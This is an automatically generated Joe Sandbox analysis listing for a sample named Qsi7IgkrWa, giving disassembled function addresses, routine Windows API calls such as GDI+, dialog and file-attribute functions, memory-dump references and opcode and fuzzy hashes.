Instruction Fuzzy Hash: DFE092315402096BEB019F60DC85FFA37DCEB08781F4840A1B945D7051EBA1DE84DA50

Function 00BCAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00BE2641,000000FF), ref: 00BCACB0
CoUninitialize.COMBASE(?,?,?,?,00BE2641,000000FF), ref: 00BCACB5

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 20492e0187cf1aa208a6b49029dfb9e3f20e70cb033ad2160021d792d289f040
Instruction ID: e718410c5defe5b6cdc6bdea00ec734a809e6c447f8db0ddd69b28202fc86364
Opcode Fuzzy Hash: 20492e0187cf1aa208a6b49029dfb9e3f20e70cb033ad2160021d792d289f040
Instruction Fuzzy Hash: 4BE03972604A90EFCA009B59DC46B59FBE8FB88A20F14436AA416937A0CB74A800CA90

Function 00BBA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00BBA23A,?,00BB755C,?,?,?,?), ref: 00BBA254

Part of subcall function 00BBBB03: _wcslen.LIBCMT ref: 00BBBB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00BBA23A,?,00BB755C,?,?,?,?), ref: 00BBA280

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 6ccb513fd78a09a7d69e9b1dd5326ea1292d51a7dfb1d25c5e41667319938506
Instruction ID: 901b6043b247f138101a68f584ecc412cf2040faca3668fc2838c15dfbdd6b05
Opcode Fuzzy Hash: 6ccb513fd78a09a7d69e9b1dd5326ea1292d51a7dfb1d25c5e41667319938506
Instruction Fuzzy Hash: ACE09232900124ABCB60AB64CC49BE9B7D8EB087E1F0442A1FD55E71D1DBB0DE44CAA0

Function 00BCDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BCDEEC

Part of subcall function 00BB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB40A5

SetDlgItemTextW.USER32(00000065,?), ref: 00BCDF03

Part of subcall function 00BCB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BCB579
Part of subcall function 00BCB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BCB58A
Part of subcall function 00BCB568: IsDialogMessageW.USER32(0001044E,?), ref: 00BCB59E
Part of subcall function 00BCB568: TranslateMessage.USER32(?), ref: 00BCB5AC
Part of subcall function 00BCB568: DispatchMessageW.USER32(?), ref: 00BCB5B6

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: f5ba9306412b0b0502ea55f509fc00c8717bd040f7ac2dd7b2562895de5ce163
Instruction ID: d4b73445afd99de720500e8894f47c96d79c767cc9e8cb221d2fb2313d199226
Opcode Fuzzy Hash: f5ba9306412b0b0502ea55f509fc00c8717bd040f7ac2dd7b2562895de5ce163
Instruction Fuzzy Hash: FBE092B250024866DF02AB64DC06FEE3BECAB05785F440895B201DB1B3DA78EA108661

Function 00BC081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BC0836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BBF2D8,Crypt32.dll,00000000,00BBF35C,?,?,00BBF33E,?,?,?), ref: 00BC0858

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 6be9553eb61880236cf53edd6aeb1aae2d563b170072e274070e8c01b6aec17f
Instruction ID: 81485f4d81a2050918b393f68054071a70ece709f1de5b2e5c78638f303aa6d3
Opcode Fuzzy Hash: 6be9553eb61880236cf53edd6aeb1aae2d563b170072e274070e8c01b6aec17f
Instruction Fuzzy Hash: CCE04876400158ABDB11A794DC49FDB77ECEF097D1F0400A57645D3005DAB4DA84CBB0

Function 00BCA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00BCA3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00BCA3E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 69c5b35a37072138252d7f34c1addc8ca9a83f871a9bcd39058634c0fbc949a8
Instruction ID: 9fc4dd4f24aa0db2fe6229909a78a173a2895b3fa44f5288679dfc887d60e6b6
Opcode Fuzzy Hash: 69c5b35a37072138252d7f34c1addc8ca9a83f871a9bcd39058634c0fbc949a8
Instruction Fuzzy Hash: CCE0ED72500218EBCB10DF55C541BA9BBE8EB04365F10849EA85693201E374AE04DB91

Function 00BD2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BD2BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00BD2BB5

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: a11153fd9101f30a6713944cbedacbdbd36032c1088321ff98307cae3e65508a
Instruction ID: 8c76113ada75a4bd31201548e48421309b05bb8935b2cc3106fd7527c7b3e0c6
Opcode Fuzzy Hash: a11153fd9101f30a6713944cbedacbdbd36032c1088321ff98307cae3e65508a
Instruction Fuzzy Hash: DFD0A938268380186D146B702A02898E7C6EDB2B70BA016EBE4208A7C2FED08080A026

Function 00BB12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00BB1306
ShowWindow.USER32(00000000), ref: 00BB130D

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 3e41faf8740b706a4852d0575dec4b2359916ca68193ff92717d14657274ff03
Instruction ID: 52bda81ee437e2582283083293472cfb3825cd0d4d8535b184281b419357cfef
Opcode Fuzzy Hash: 3e41faf8740b706a4852d0575dec4b2359916ca68193ff92717d14657274ff03
Instruction Fuzzy Hash: 96C012B265C280BECB010BB4DC09E6FBBA8BBA6316F24C908B0A5C0060C238C110DB11

Function 00BB1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BB1A09

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c93bc14bb62e5b833056f34df5c9342455fac238d7a5e6300e870e5684170cd1
Instruction ID: 21c4326fec4dd8c5d170a5884494ef20d2a2cdf05973fa002f1fca12d720eb36
Opcode Fuzzy Hash: c93bc14bb62e5b833056f34df5c9342455fac238d7a5e6300e870e5684170cd1
Instruction Fuzzy Hash: 64C17C30A002549BEF25CF6CC4E8BF97BE5EF15310F5809F9EC459F296DAA09944CB61

Function 00BB3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BB3BBF

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 01a5efe85d22f7b9313d91dd2dd54521c9ec73fe0b4a8d11f9becf17bb4f0afa
Instruction ID: 27c3b8c3013112f196515792b3116a7ef8dc0b5bc8ebf97164c3cc233a4e0d10
Opcode Fuzzy Hash: 01a5efe85d22f7b9313d91dd2dd54521c9ec73fe0b4a8d11f9becf17bb4f0afa
Instruction Fuzzy Hash: 0A71C371500B849FDB25DB74C895AF7B7E9EF14700F4009AEE1AB87241EA727A44DF21

Function 00BB8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BB8289

Part of subcall function 00BB13DC: __EH_prolog.LIBCMT ref: 00BB13E1

Part of subcall function 00BBA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BBA598

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: bd4bc00094ad4645072c52ee542f96177d521e77116ec00147769f9a104f8c62
Instruction ID: 9e16c27daa84bae55a811c4d9f33f7349b840089c45fca8b681e9db128fa173a
Opcode Fuzzy Hash: bd4bc00094ad4645072c52ee542f96177d521e77116ec00147769f9a104f8c62
Instruction Fuzzy Hash: 304183719446589BDB20EB64CC55BFAB7ECEF00304F4404EAE18AA7193EBF55E89CB50

Function 00BB13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BB13E1

Part of subcall function 00BB5E37: __EH_prolog.LIBCMT ref: 00BB5E3C

Part of subcall function 00BBCE40: __EH_prolog.LIBCMT ref: 00BBCE45

Part of subcall function 00BBB505: __EH_prolog.LIBCMT ref: 00BBB50A

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 8b6151ecdf5bf1b9d73030d0b5d09a308c018554c79c5fa6da691c40e517bf5f
Instruction ID: 0c0b62c495c5f4893c780503c4ba8c980ea9e239770df35448a6e48f268ef581
Opcode Fuzzy Hash: 8b6151ecdf5bf1b9d73030d0b5d09a308c018554c79c5fa6da691c40e517bf5f
Instruction Fuzzy Hash: 564148B0905B409EE724CF398895AE6FBE5FF28300F5049AED5FE83282CB716654CB10

Function 00BB13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BB13E1

Part of subcall function 00BB5E37: __EH_prolog.LIBCMT ref: 00BB5E3C

Part of subcall function 00BBCE40: __EH_prolog.LIBCMT ref: 00BBCE45

Part of subcall function 00BBB505: __EH_prolog.LIBCMT ref: 00BBB50A

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 05ba5e0cd62e3041ff28da7afdba232143f75bb782a57dd1dfbb8aa94d11f3d1
Instruction ID: 74e2dda41ea380a78bda1753b5ccfb7c2f2bcbc5fa75d6b02a4ef1ae1b29ec6e
Opcode Fuzzy Hash: 05ba5e0cd62e3041ff28da7afdba232143f75bb782a57dd1dfbb8aa94d11f3d1
Instruction Fuzzy Hash: 1B4147B0905B409EE724DF798895AE6FBE5FF28300F5049AED5FE83282CB716654CB11

Function 00BCB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BCB098

Part of subcall function 00BB13DC: __EH_prolog.LIBCMT ref: 00BB13E1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f548786fa9077a5312ec6b3043266e3fa2db44b4a38ef536918921f9185d87d5
Instruction ID: 2d155f26590b7a83723d279836a0d0be0d3f5b86b0abd7c14c28d101c30f31c5
Opcode Fuzzy Hash: f548786fa9077a5312ec6b3043266e3fa2db44b4a38ef536918921f9185d87d5
Instruction Fuzzy Hash: 45316C758102499BCF15DF68C861AFEB7F4AF09300F5444DEE409B7242D775AE04CB61

Function 00BDAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00BDACF8

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 8fa04fa1d374c16cdefb0a7a8c801b4be51b30f247d418c8a87e94c3eab35654
Instruction ID: 67135f03afa6213f43de97e19e449421c133bcb312cda54654a1869cfb459958
Opcode Fuzzy Hash: 8fa04fa1d374c16cdefb0a7a8c801b4be51b30f247d418c8a87e94c3eab35654
Instruction Fuzzy Hash: B411CA37A116256F9B219E18DC9099AF3D6EB84770B1A41B2FD15AF354FB30DC0187D2

Function 00BBCE40 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BBCE45

Part of subcall function 00BB5E37: __EH_prolog.LIBCMT ref: 00BB5E3C

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 65e589e476e5e450f446507fb4814de7d8300fd064327969d7c43859367eb692
Instruction ID: de78a70f397d7803efd03a35d9baaf942cd9c4d7f5a1aaf3bab05f2bcb280057
Opcode Fuzzy Hash: 65e589e476e5e450f446507fb4814de7d8300fd064327969d7c43859367eb692
Instruction Fuzzy Hash: 4C112171A01244DBEB15DB798945BFEBBE89F44300F1444ADA446A3682DBF49E04C762

Function 00BB9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BB921A

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

